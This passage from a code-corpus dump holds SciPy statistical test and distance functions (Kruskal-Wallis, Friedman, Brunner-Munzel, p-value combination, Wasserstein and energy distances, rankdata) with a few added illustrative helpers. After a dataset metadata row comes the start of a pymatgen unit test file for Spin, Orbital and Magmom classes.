KruskalResult(statistic=0.2727272727272734, pvalue=0.6015081344405895)
>>> x = [1, 1, 1]
>>> y = [2, 2, 2]
>>> z = [2, 2]
>>> stats.kruskal(x, y, z)
KruskalResult(statistic=7.0, pvalue=0.0301973834223185)
"""
args = list(map(np.asarray, args))
num_groups = len(args)
if num_groups < 2:
raise ValueError("Need at least two groups in stats.kruskal()")
for arg in args:
if arg.size == 0:
return KruskalResult(np.nan, np.nan)
elif arg.ndim != 1:
raise ValueError("Samples must be one-dimensional.")
n = np.asarray(list(map(len, args)))
if nan_policy not in ('propagate', 'raise', 'omit'):
raise ValueError("nan_policy must be 'propagate', 'raise' or 'omit'")
contains_nan = False
for arg in args:
cn = _contains_nan(arg, nan_policy)
if cn[0]:
contains_nan = True
break
if contains_nan and nan_policy == 'omit':
for a in args:
a = ma.masked_invalid(a)
return mstats_basic.kruskal(*args)
if contains_nan and nan_policy == 'propagate':
return KruskalResult(np.nan, np.nan)
alldata = np.concatenate(args)
ranked = rankdata(alldata)
ties = tiecorrect(ranked)
if ties == 0:
raise ValueError('All numbers are identical in kruskal')
# Compute sum^2/n for each group and sum
j = np.insert(np.cumsum(n), 0, 0)
ssbn = 0
for i in range(num_groups):
ssbn += _square_of_sums(ranked[j[i]:j[i+1]]) / n[i]
totaln = np.sum(n, dtype=float)
h = 12.0 / (totaln * (totaln + 1)) * ssbn - 3 * (totaln + 1)
df = num_groups - 1
h /= ties
return KruskalResult(h, distributions.chi2.sf(h, df))
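# Illustrative sketch, not part of the public API: the Kruskal-Wallis H
# statistic before the tie correction applied above. The `_demo_` name is made
# up; plain 1-D groups and the module-level `rankdata` import are assumed.
def _demo_kruskal_h_uncorrected(*groups):
    groups = [np.asarray(g, dtype=np.float64) for g in groups]
    sizes = [g.size for g in groups]
    ranks = rankdata(np.concatenate(groups))
    total_n = float(sum(sizes))
    ssbn = 0.0
    start = 0
    for size in sizes:
        group_ranks = ranks[start:start + size]
        ssbn += group_ranks.sum()**2 / size
        start += size
    return 12.0 / (total_n * (total_n + 1)) * ssbn - 3 * (total_n + 1)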
FriedmanchisquareResult = namedtuple('FriedmanchisquareResult',
('statistic', 'pvalue'))
def friedmanchisquare(*args):
"""Compute the Friedman test for repeated measurements.
The Friedman test tests the null hypothesis that repeated measurements of
the same individuals have the same distribution. It is often used
to test for consistency among measurements obtained in different ways.
For example, if two measurement techniques are used on the same set of
individuals, the Friedman test can be used to determine if the two
measurement techniques are consistent.
Parameters
----------
measurements1, measurements2, measurements3... : array_like
Arrays of measurements. All of the arrays must have the same number
of elements. At least 3 sets of measurements must be given.
Returns
-------
statistic : float
The test statistic, correcting for ties.
pvalue : float
The associated p-value assuming that the test statistic has a chi
squared distribution.
Notes
-----
Due to the assumption that the test statistic has a chi squared
distribution, the p-value is only reliable for n > 10 and more than
6 repeated measurements.
References
----------
.. [1] https://en.wikipedia.org/wiki/Friedman_test
"""
k = len(args)
if k < 3:
raise ValueError('At least 3 sets of measurements must be given '
'for Friedman test, got {}.'.format(k))
n = len(args[0])
for i in range(1, k):
if len(args[i]) != n:
raise ValueError('Unequal N in friedmanchisquare. Aborting.')
# Rank data
data = np.vstack(args).T
data = data.astype(float)
for i in range(len(data)):
data[i] = rankdata(data[i])
# Handle ties
ties = 0
for d in data:
replist, repnum = find_repeats(array(d))
for t in repnum:
ties += t * (t*t - 1)
c = 1 - ties / (k*(k*k - 1)*n)
ssbn = np.sum(data.sum(axis=0)**2)
chisq = (12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)) / c
return FriedmanchisquareResult(chisq, distributions.chi2.sf(chisq, k - 1))
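# Illustrative usage sketch, not part of the public API: three repeated
# measurements on the same five individuals. The `_demo_` name and the data
# are made up for illustration.
def _demo_friedmanchisquare():
    before = [72, 96, 88, 92, 74]
    after_one_week = [70, 91, 88, 89, 70]
    after_one_month = [68, 88, 85, 87, 69]
    return friedmanchisquare(before, after_one_week, after_one_month)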
BrunnerMunzelResult = namedtuple('BrunnerMunzelResult',
('statistic', 'pvalue'))
def brunnermunzel(x, y, alternative="two-sided", distribution="t",
nan_policy='propagate'):
"""Compute the Brunner-Munzel test on samples x and y.
The Brunner-Munzel test is a nonparametric test of the null hypothesis that
when values are taken one by one from each group, the probabilities of
getting large values in both groups are equal.
Unlike the Wilcoxon-Mann-Whitney U test, this does not require the
assumption of equal variances in the two groups. Note that this does not assume
the distributions are the same. This test works on two independent samples,
which may have different sizes.
Parameters
----------
x, y : array_like
Array of samples, should be one-dimensional.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
distribution : {'t', 'normal'}, optional
Defines how to get the p-value.
The following options are available (default is 't'):
* 't': get the p-value by t-distribution
* 'normal': get the p-value by standard normal distribution.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Brunner-Munzel W statistic.
pvalue : float
p-value assuming a t distribution. One-sided or
two-sided, depending on the choice of `alternative` and `distribution`.
See Also
--------
mannwhitneyu : Mann-Whitney rank test on two samples.
Notes
-----
Brunner and Munzel recommended estimating the p-value using the t-distribution
when the sample size is 50 or less. If the size is lower than 10, it would
be better to use the permuted Brunner-Munzel test (see [2]_).
References
----------
.. [1] Brunner, E. and Munzel, U. "The nonparametric Behrens-Fisher
problem: Asymptotic theory and a small-sample approximation".
Biometrical Journal. Vol. 42(2000): 17-25.
.. [2] Neubert, K. and Brunner, E. "A studentized permutation test for the
non-parametric Behrens-Fisher problem". Computational Statistics and
Data Analysis. Vol. 51(2007): 5192-5204.
Examples
--------
>>> from scipy import stats
>>> x1 = [1,2,1,1,1,1,1,1,1,1,2,4,1,1]
>>> x2 = [3,3,4,3,1,2,3,1,1,5,4]
>>> w, p_value = stats.brunnermunzel(x1, x2)
>>> w
3.1374674823029505
>>> p_value
0.0057862086661515377
"""
x = np.asarray(x)
y = np.asarray(y)
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == "omit" or npy == "omit":
nan_policy = "omit"
if contains_nan and nan_policy == "propagate":
return BrunnerMunzelResult(np.nan, np.nan)
elif contains_nan and nan_policy == "omit":
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
return mstats_basic.brunnermunzel(x, y, alternative, distribution)
nx = len(x)
ny = len(y)
if nx == 0 or ny == 0:
return BrunnerMunzelResult(np.nan, np.nan)
rankc = rankdata(np.concatenate((x, y)))
rankcx = rankc[0:nx]
rankcy = rankc[nx:nx+ny]
rankcx_mean = np.mean(rankcx)
rankcy_mean = np.mean(rankcy)
rankx = rankdata(x)
ranky = rankdata(y)
rankx_mean = np.mean(rankx)
ranky_mean = np.mean(ranky)
Sx = np.sum(np.power(rankcx - rankx - rankcx_mean + rankx_mean, 2.0))
Sx /= nx - 1
Sy = np.sum(np.power(rankcy - ranky - rankcy_mean + ranky_mean, 2.0))
Sy /= ny - 1
wbfn = nx * ny * (rankcy_mean - rankcx_mean)
wbfn /= (nx + ny) * np.sqrt(nx * Sx + ny * Sy)
if distribution == "t":
df_numer = np.power(nx * Sx + ny * Sy, 2.0)
df_denom = np.power(nx * Sx, 2.0) / (nx - 1)
df_denom += np.power(ny * Sy, 2.0) / (ny - 1)
df = df_numer / df_denom
p = distributions.t.cdf(wbfn, df)
elif distribution == "normal":
p = distributions.norm.cdf(wbfn)
else:
raise ValueError(
"distribution should be 't' or 'normal'")
if alternative == "greater":
pass
elif alternative == "less":
p = 1 - p
elif alternative == "two-sided":
p = 2 * np.min([p, 1-p])
else:
raise ValueError(
"alternative should be 'less', 'greater' or 'two-sided'")
return BrunnerMunzelResult(wbfn, p)
def combine_pvalues(pvalues, method='fisher', weights=None):
"""
Combine p-values from independent tests bearing upon the same hypothesis.
Parameters
----------
pvalues : array_like, 1-D
Array of p-values assumed to come from independent tests.
method : {'fisher', 'pearson', 'tippett', 'stouffer',
'mudholkar_george'}, optional
Name of method to use to combine p-values.
The following methods are available (default is 'fisher'):
* 'fisher': Fisher's method (Fisher's combined probability test), the
sum of the logarithm of the p-values
* 'pearson': Pearson's method (similar to Fisher's but uses sum of the
complement of the p-values inside the logarithms)
* 'tippett': Tippett's method (minimum of p-values)
* 'stouffer': Stouffer's Z-score method
* 'mudholkar_george': the difference of Fisher's and Pearson's methods
divided by 2
weights : array_like, 1-D, optional
Optional array of weights used only for Stouffer's Z-score method.
Returns
-------
statistic: float
The statistic calculated by the specified method.
pval: float
The combined p-value.
Notes
-----
Fisher's method (also known as Fisher's combined probability test) [1]_ uses
a chi-squared statistic to compute a combined p-value. The closely related
Stouffer's Z-score method [2]_ uses Z-scores rather than p-values. The
advantage of Stouffer's method is that it is straightforward to introduce
weights, which can make Stouffer's method more powerful than Fisher's
method when the p-values are from studies of different size [6]_ [7]_.
Pearson's method uses :math:`log(1-p_i)` inside the sum whereas Fisher's
method uses :math:`log(p_i)` [4]_. For Fisher's and Pearson's method, the
sum of the logarithms is multiplied by -2 in the implementation. This
quantity has a chi-square distribution that determines the p-value. The
`mudholkar_george` method is the difference of the Fisher's and Pearson's
test statistics, each of which includes the -2 factor [4]_. However, the
`mudholkar_george` method does not include these -2 factors. The test
statistic of `mudholkar_george` is the sum of logistic random variables and
equation 3.6 in [3]_ is used to approximate the p-value based on Student's
t-distribution.
Fisher's method may be extended to combine p-values from dependent tests
[5]_. Extensions such as Brown's method and Kost's method are not currently
implemented.
.. versionadded:: 0.15.0
References
----------
.. [1] https://en.wikipedia.org/wiki/Fisher%27s_method
.. [2] https://en.wikipedia.org/wiki/Fisher%27s_method#Relation_to_Stouffer.27s_Z-score_method
.. [3] George, E. O., and G. S. Mudholkar. "On the convolution of logistic
random variables." Metrika 30.1 (1983): 1-13.
.. [4] Heard, N. and Rubin-Delanchey, P. "Choosing between methods of
combining p-values." Biometrika 105.1 (2018): 239-246.
.. [5] Whitlock, M. C. "Combining probability from independent tests: the
weighted Z-method is superior to Fisher's approach." Journal of
Evolutionary Biology 18, no. 5 (2005): 1368-1373.
.. [6] Zaykin, Dmitri V. "Optimally weighted Z-test is a powerful method
for combining probabilities in meta-analysis." Journal of
Evolutionary Biology 24, no. 8 (2011): 1836-1841.
.. [7] https://en.wikipedia.org/wiki/Extensions_of_Fisher%27s_method
"""
pvalues = np.asarray(pvalues)
if pvalues.ndim != 1:
raise ValueError("pvalues is not 1-D")
if method == 'fisher':
statistic = -2 * np.sum(np.log(pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'pearson':
statistic = -2 * np.sum(np.log1p(-pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'mudholkar_george':
normalizing_factor = np.sqrt(3/len(pvalues))/np.pi
statistic = -np.sum(np.log(pvalues)) + np.sum(np.log1p(-pvalues))
nu = 5 * len(pvalues) + 4
approx_factor = np.sqrt(nu / (nu - 2))
pval = distributions.t.sf(statistic * normalizing_factor
* approx_factor, nu)
elif method == 'tippett':
statistic = np.min(pvalues)
pval = distributions.beta.sf(statistic, 1, len(pvalues))
elif method == 'stouffer':
if weights is None:
weights = np.ones_like(pvalues)
elif len(weights) != len(pvalues):
raise ValueError("pvalues and weights must be of the same size.")
weights = np.asarray(weights)
if weights.ndim != 1:
raise ValueError("weights is not 1-D")
Zi = distributions.norm.isf(pvalues)
statistic = np.dot(weights, Zi) / np.linalg.norm(weights)
pval = distributions.norm.sf(statistic)
else:
raise ValueError(
    "Invalid method %r. Options are 'fisher', 'pearson', "
    "'mudholkar_george', 'tippett', or 'stouffer'." % method)
return (statistic, pval)
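# Illustrative sketch, not part of the public API: Fisher's method by hand.
# Under the joint null, -2*sum(log(p_i)) is chi-squared with 2k degrees of
# freedom. The `_demo_` name is made up; it assumes the module-level `np` and
# `distributions` imports and should match combine_pvalues(pvalues, 'fisher').
def _demo_fisher_method_by_hand(pvalues):
    pvalues = np.asarray(pvalues, dtype=np.float64)
    statistic = -2.0 * np.sum(np.log(pvalues))
    pval = distributions.chi2.sf(statistic, 2 * pvalues.size)
    return statistic, pval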
#####################################
# STATISTICAL DISTANCES #
#####################################
def wasserstein_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute the first Wasserstein distance between two 1D distributions.
This distance is also known as the earth mover's distance, since it can be
seen as the minimum amount of "work" required to transform :math:`u` into
:math:`v`, where "work" is measured as the amount of distribution weight
that must be moved, multiplied by the distance it has to be moved.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The first Wasserstein distance between the distributions :math:`u` and
:math:`v` is:
.. math::
l_1 (u, v) = \inf_{\pi \in \Gamma (u, v)} \int_{\mathbb{R} \times
\mathbb{R}} |x-y| \mathrm{d} \pi (x, y)
where :math:`\Gamma (u, v)` is the set of (probability) distributions on
:math:`\mathbb{R} \times \mathbb{R}` whose marginals are :math:`u` and
:math:`v` on the first and second factors respectively.
If :math:`U` and :math:`V` are the respective CDFs of :math:`u` and
:math:`v`, this distance also equals to:
.. math::
l_1(u, v) = \int_{-\infty}^{+\infty} |U-V|
See [2]_ for a proof of the equivalence of both definitions.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] "Wasserstein metric", https://en.wikipedia.org/wiki/Wasserstein_metric
.. [2] Ramdas, Garcia, Cuturi "On Wasserstein Two Sample Testing and Related
Families of Nonparametric Tests" (2015). :arXiv:`1509.02237`.
Examples
--------
>>> from scipy.stats import wasserstein_distance
>>> wasserstein_distance([0, 1, 3], [5, 6, 8])
5.0
>>> wasserstein_distance([0, 1], [0, 1], [3, 1], [2, 2])
0.25
>>> wasserstein_distance([3.4, 3.9, 7.5, 7.8], [4.5, 1.4],
... [1.4, 0.9, 3.1, 7.2], [3.2, 3.5])
4.0781331438047861
"""
return _cdf_distance(1, u_values, v_values, u_weights, v_weights)
def energy_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""Compute the energy distance between two 1D distributions.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The energy distance between two distributions :math:`u` and :math:`v`, whose
respective CDFs are :math:`U` and :math:`V`, equals to:
.. math::
D(u, v) = \left( 2\mathbb E|X - Y| - \mathbb E|X - X'| -
\mathbb E|Y - Y'| \right)^{1/2}
where :math:`X` and :math:`X'` (resp. :math:`Y` and :math:`Y'`) are
independent random variables whose probability distribution is :math:`u`
(resp. :math:`v`).
As shown in [2]_, for one-dimensional real-valued variables, the energy
distance is linked to the non-distribution-free version of the Cramér-von
Mises distance:
.. math::
D(u, v) = \sqrt{2} l_2(u, v) = \left( 2 \int_{-\infty}^{+\infty} (U-V)^2
\right)^{1/2}
Note that the common Cramér-von Mises criterion uses the distribution-free
version of the distance. See [2]_ (section 2), for more details about both
versions of the distance.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] "Energy distance", https://en.wikipedia.org/wiki/Energy_distance
.. [2] Szekely "E-statistics: The energy of statistical samples." Bowling
Green State University, Department of Mathematics and Statistics,
Technical Report 02-16 (2002).
.. [3] Rizzo, Szekely "Energy distance." Wiley Interdisciplinary Reviews:
Computational Statistics, 8(1):27-38 (2015).
.. [4] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
Examples
--------
>>> from scipy.stats import energy_distance
>>> energy_distance([0], [2])
2.0000000000000004
>>> energy_distance([0, 8], [0, 8], [3, 1], [2, 2])
1.0000000000000002
>>> energy_distance([0.7, 7.4, 2.4, 6.8], [1.4, 8. ],
... [2.1, 4.2, 7.4, 8. ], [7.6, 8.8])
0.88003340976158217
"""
return np.sqrt(2) * _cdf_distance(2, u_values, v_values,
u_weights, v_weights)
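# Illustrative sketch (hypothetical helper, not part of the original module):
# the expectation-based definition in the docstring above can be brute-forced
# for small unweighted samples and compared with the CDF-based implementation.
def _energy_distance_bruteforce_sketch(u_values, v_values):
    u = np.asarray(u_values, dtype=float)
    v = np.asarray(v_values, dtype=float)
    # E|X - Y|, E|X - X'| and E|Y - Y'| for the uniform empirical distributions.
    e_xy = np.mean(np.abs(u[:, None] - v[None, :]))
    e_xx = np.mean(np.abs(u[:, None] - u[None, :]))
    e_yy = np.mean(np.abs(v[:, None] - v[None, :]))
    return np.sqrt(2 * e_xy - e_xx - e_yy)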
def _cdf_distance(p, u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute, between two one-dimensional distributions :math:`u` and
:math:`v`, whose respective CDFs are :math:`U` and :math:`V`, the
statistical distance that is defined as:
.. math::
l_p(u, v) = \left( \int_{-\infty}^{+\infty} |U-V|^p \right)^{1/p}
    p is a positive parameter; p = 1 gives the Wasserstein distance, and
    p = 2 gives, up to a factor of :math:`\sqrt{2}`, the energy distance (see
    `energy_distance`).
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
"""
u_values, u_weights = _validate_distribution(u_values, u_weights)
v_values, v_weights = _validate_distribution(v_values, v_weights)
u_sorter = np.argsort(u_values)
v_sorter = np.argsort(v_values)
all_values = np.concatenate((u_values, v_values))
all_values.sort(kind='mergesort')
# Compute the differences between pairs of successive values of u and v.
deltas = np.diff(all_values)
# Get the respective positions of the values of u and v among the values of
# both distributions.
u_cdf_indices = u_values[u_sorter].searchsorted(all_values[:-1], 'right')
v_cdf_indices = v_values[v_sorter].searchsorted(all_values[:-1], 'right')
# Calculate the CDFs of u and v using their weights, if specified.
if u_weights is None:
u_cdf = u_cdf_indices / u_values.size
else:
u_sorted_cumweights = np.concatenate(([0],
np.cumsum(u_weights[u_sorter])))
u_cdf = u_sorted_cumweights[u_cdf_indices] / u_sorted_cumweights[-1]
if v_weights is None:
v_cdf = v_cdf_indices / v_values.size
else:
v_sorted_cumweights = np.concatenate(([0],
np.cumsum(v_weights[v_sorter])))
v_cdf = v_sorted_cumweights[v_cdf_indices] / v_sorted_cumweights[-1]
# Compute the value of the integral based on the CDFs.
# If p = 1 or p = 2, we avoid using np.power, which introduces an overhead
# of about 15%.
if p == 1:
return np.sum(np.multiply(np.abs(u_cdf - v_cdf), deltas))
if p == 2:
return np.sqrt(np.sum(np.multiply(np.square(u_cdf - v_cdf), deltas)))
return np.power(np.sum(np.multiply(np.power(np.abs(u_cdf - v_cdf), p),
deltas)), 1/p)
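# Illustrative sketch (hypothetical helper, not part of the original module):
# a slower but more direct evaluation of the same integral for unweighted
# samples, building both empirical CDFs as step functions on the merged
# support and summing |U - V|**p over each interval between breakpoints.
def _cdf_distance_naive_sketch(p, u_values, v_values):
    u = np.sort(np.asarray(u_values, dtype=float))
    v = np.sort(np.asarray(v_values, dtype=float))
    support = np.sort(np.concatenate((u, v)))
    deltas = np.diff(support)
    # CDF value of each distribution on the interval starting at support[i].
    u_cdf = np.searchsorted(u, support[:-1], side='right') / u.size
    v_cdf = np.searchsorted(v, support[:-1], side='right') / v.size
    return np.sum(np.abs(u_cdf - v_cdf) ** p * deltas) ** (1.0 / p)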
def _validate_distribution(values, weights):
"""
    Validate the values and weights from a distribution input of `_cdf_distance`
and return them as ndarray objects.
Parameters
----------
values : array_like
Values observed in the (empirical) distribution.
weights : array_like
Weight for each value.
Returns
-------
values : ndarray
Values as ndarray.
weights : ndarray
Weights as ndarray.
"""
# Validate the value array.
values = np.asarray(values, dtype=float)
if len(values) == 0:
raise ValueError("Distribution can't be empty.")
# Validate the weight array, if specified.
if weights is not None:
weights = np.asarray(weights, dtype=float)
if len(weights) != len(values):
raise ValueError('Value and weight array-likes for the same '
'empirical distribution must be of the same size.')
if np.any(weights < 0):
raise ValueError('All weights must be non-negative.')
if not 0 < np.sum(weights) < np.inf:
raise ValueError('Weight array-like sum must be positive and '
'finite. Set as None for an equal distribution of '
'weight.')
return values, weights
return values, None
#####################################
# SUPPORT FUNCTIONS #
#####################################
RepeatedResults = namedtuple('RepeatedResults', ('values', 'counts'))
def find_repeats(arr):
"""Find repeats and repeat counts.
Parameters
----------
arr : array_like
Input array. This is cast to float64.
Returns
-------
values : ndarray
The unique values from the (flattened) input that are repeated.
counts : ndarray
Number of times the corresponding 'value' is repeated.
Notes
-----
In numpy >= 1.9 `numpy.unique` provides similar functionality. The main
difference is that `find_repeats` only returns repeated values.
Examples
--------
>>> from scipy import stats
>>> stats.find_repeats([2, 1, 2, 3, 2, 2, 5])
RepeatedResults(values=array([2.]), counts=array([4]))
>>> stats.find_repeats([[10, 20, 1, 2], [5, 5, 4, 4]])
RepeatedResults(values=array([4., 5.]), counts=array([2, 2]))
"""
# Note: always copies.
return RepeatedResults(*_find_repeats(np.array(arr, dtype=np.float64)))
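# Illustrative sketch (hypothetical helper, not part of the original module):
# the note above about `numpy.unique` made concrete -- keeping only values
# whose count exceeds one mirrors what `find_repeats` returns.
def _find_repeats_with_unique_sketch(arr):
    values, counts = np.unique(np.asarray(arr, dtype=np.float64).ravel(),
                               return_counts=True)
    repeated = counts > 1
    return values[repeated], counts[repeated]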
def _sum_of_squares(a, axis=0):
"""Square each element of the input array, and return the sum(s) of that.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
sum_of_squares : ndarray
The sum along the given axis for (a**2).
See Also
--------
_square_of_sums : The square(s) of the sum(s) (the opposite of
`_sum_of_squares`).
"""
a, axis = _chk_asarray(a, axis)
return np.sum(a*a, axis)
def _square_of_sums(a, axis=0):
"""Sum elements of the input array, and return the square(s) of that sum.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
square_of_sums : float or ndarray
The square of the sum over `axis`.
See Also
--------
    _sum_of_squares : The sum of squares (the opposite of `_square_of_sums`).
"""
a, axis = _chk_asarray(a, axis)
s = np.sum(a, axis)
if not np.isscalar(s):
return s.astype(float) * s
else:
return float(s) * s
def rankdata(a, method='average', *, axis=None):
"""Assign ranks to data, dealing with ties appropriately.
By default (``axis=None``), the data array is first flattened, and a flat
array of ranks is returned. Separately reshape the rank array to the
shape of the data array if desired (see Examples).
Ranks begin at 1. The `method` argument controls how ranks are assigned
to equal values. See [1]_ for further discussion of ranking methods.
Parameters
----------
a : array_like
The array of values to be ranked.
method : {'average', 'min', 'max', 'dense', 'ordinal'}, optional
The method used to assign ranks to tied elements.
The following methods are available (default is 'average'):
* 'average': The average of the ranks that would have been assigned to
all the tied values is assigned to each value.
* 'min': The minimum of the ranks that would have been assigned to all
the tied values is assigned to each value. (This is also
referred to as "competition" ranking.)
* 'max': The maximum of the ranks that would have been assigned to all
the tied values is assigned to each value.
* 'dense': Like 'min', but the rank of the next highest element is
assigned the rank immediately after those assigned to the tied
elements.
* 'ordinal': All values are given a distinct rank, corresponding to
the order that the values occur in `a`.
axis : {None, int}, optional
Axis along which to perform the ranking. If ``None``, the data array
is first flattened.
Returns
-------
ranks : ndarray
An array of size equal to the size of `a`, containing rank
scores.
References
----------
.. [1] "Ranking", https://en.wikipedia.org/wiki/Ranking
Examples
--------
>>> from scipy.stats import rankdata
>>> rankdata([0, 2, 3, 2])
array([ 1. , 2.5, 4. , 2.5])
>>> rankdata([0, 2, 3, 2], method='min')
array([ 1, 2, 4, 2])
>>> rankdata([0, 2, 3, 2], method='max')
array([ 1, 3, 4, 3])
>>> rankdata([0, 2, 3, 2], method='dense')
array([ 1, 2, 3, 2])
>>> rankdata([0, 2, 3, 2], method='ordinal')
array([ 1, 2, 4, 3])
>>> rankdata([[0, 2], [3, 2]]).reshape(2,2)
array([[1. , 2.5],
[4. , 2.5]])
>>> rankdata([[0, 2, 2], [3, 2, 5]], axis=1)
array([[1. , 2.5, 2.5],
[2. , 1. , 3. ]])
"""
if method not in ('average', 'min', 'max', 'dense', 'ordinal'):
raise ValueError('unknown method "{0}"'.format(method))
if axis is not None:
a = np.asarray(a)
if a.size == 0:
# The return values of `normalize_axis_index` are ignored. The
# call validates `axis`, even though we won't use it.
# use scipy._lib._util._normalize_axis_index when available
np.core.multiarray.normalize_axis_index(axis, a.ndim)
dt = np.float64 if method == 'average' else np.int_
return np.empty(a.shape, dtype=dt)
return np.apply_along_axis(rankdata, axis, a, method)
arr = np.ravel(np.asarray(a))
algo = 'mergesort' if method == 'ordinal' else 'quicksort'
sorter = np.argsort(arr, kind=algo)
inv = np.empty(sorter.size, dtype=np.intp)
inv[sorter] = np.arange(sorter.size, dtype=np.intp)
if method == 'ordinal':
return inv + 1
arr = arr[sorter]
obs = np.r_[True, arr[1:] != arr[:-1]]
dense = obs.cumsum()[inv]
if method == 'dense':
return dense
# cumulative counts of each unique value
count = np.r_[np.nonzero(obs)[0], len(obs)]
if method == 'max':
return count[dense]
if method == 'min':
return count[dense - 1] + 1
# average method
return .5 * (count[dense] + count[dense - 1] + 1)
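# Illustrative sketch (hypothetical helper, not part of the original module):
# a naive O(n**2) version of the 'average' method, useful for seeing what the
# cumulative-count trick above computes.
def _rankdata_average_naive_sketch(a):
    arr = np.ravel(np.asarray(a))
    ranks = np.empty(arr.size, dtype=np.float64)
    for i, x in enumerate(arr):
        smaller = np.sum(arr < x)
        equal = np.sum(arr == x)
        # The tie group occupies ranks smaller+1 .. smaller+equal; average them.
        ranks[i] = smaller + (equal + 1) / 2.0
    return ranks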
| andyfaff/scipy | scipy/stats/_stats_py.py | Python | bsd-3-clause | 315,230 | ["DIRAC"] | 1d183588f52175dca307a48e58755955133517b925e1e448f6316aa315d01925 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import unittest
from pymatgen.core import Lattice
from pymatgen.electronic_structure.core import Orbital, Spin, Magmom
import numpy as np
class SpinTest(unittest.TestCase):
def test_init(self):
self.assertEqual(int(Spin.up), 1)
self.assertEqual(int(Spin.down), -1)
def test_from_int(self):
self.assertEqual(Spin(1), Spin.up)
self.assertEqual(Spin(-1), Spin.down)
self.assertRaises(ValueError, Spin, 0)
def test_cached(self):
self.assertEqual(id(Spin(1)), id(Spin.up))
class OrbitalTest(unittest.TestCase):
def test_init(self):
for orb in Orbital:
self.assertEqual(Orbital(orb.value), orb)
self.assertRaises(ValueError, Orbital, 100)
def test_cached(self):
self.assertEqual(id(Orbital(0)), id(Orbital.s))
class MagmomTest(unittest.TestCase):
def test_init(self):
# backwards compatibility for scalar-like magmoms
magmom = Magmom(2.0)
self.assertEqual(float(magmom), 2.0)
# backwards compatibility for list-like magmoms
magmom2 = Magmom([1, 2, 3])
self.assertEqual(list(magmom2), [1, 2, 3])
self.assertEqual(magmom2.global_moment.tolist(), [1, 2, 3])
# non-default saxis, normalized internally
magmom3 = Magmom([1, 2, 3], saxis=[1, 1, 1])
self.assertTrue(np.allclose(magmom3.saxis, [np.sqrt(1/3.)]*3))
# test construction from known global moment and desired, non-default saxis
magmom4 = Magmom.from_global_moment_and_saxis([1, 2, 3], saxis=[1, 0, 0])
self.assertTrue(np.allclose(magmom4.moment, [-3, 2, 1]))
# test global moments with non-default saxis
magmom5 = Magmom([-3, 2, 1], saxis=[1, 0, 0])
self.assertTrue(np.allclose(magmom5.global_moment, [1, 2, 3]))
def test_get_moments(self):
# simple cases
magmom_along_x = Magmom([1, 0, 0])
self.assertTrue(np.allclose(magmom_along_x.get_moment(saxis=[1, 0, 0]), [0, 0, 1]))
magmom_along_y = Magmom([0, 1, 0])
self.assertTrue(np.allclose(magmom_along_y.get_moment(saxis=[0, 1, 0]), [0, 0, 1]))
# test transformations
magmoms = [[0, 0, 0],
[0, 0, 1],
[0, 0, -1],
[1, 2, 3],
[-1, 2, 3],
[-1, -2, -3]]
for magmom in magmoms:
magmom1 = Magmom(magmom)
# transform to non-default saxis
magmom2 = magmom1.get_00t_magmom_with_xyz_saxis()
# and back to default saxis
magmom3 = magmom2.get_xyz_magmom_with_001_saxis()
self.assertTrue(np.allclose(magmom1.moment, magmom))
self.assertTrue(np.allclose(magmom1.saxis, [0, 0, 1]))
self.assertTrue(np.allclose(magmom1.get_moment(saxis=magmom1.saxis), magmom1.moment))
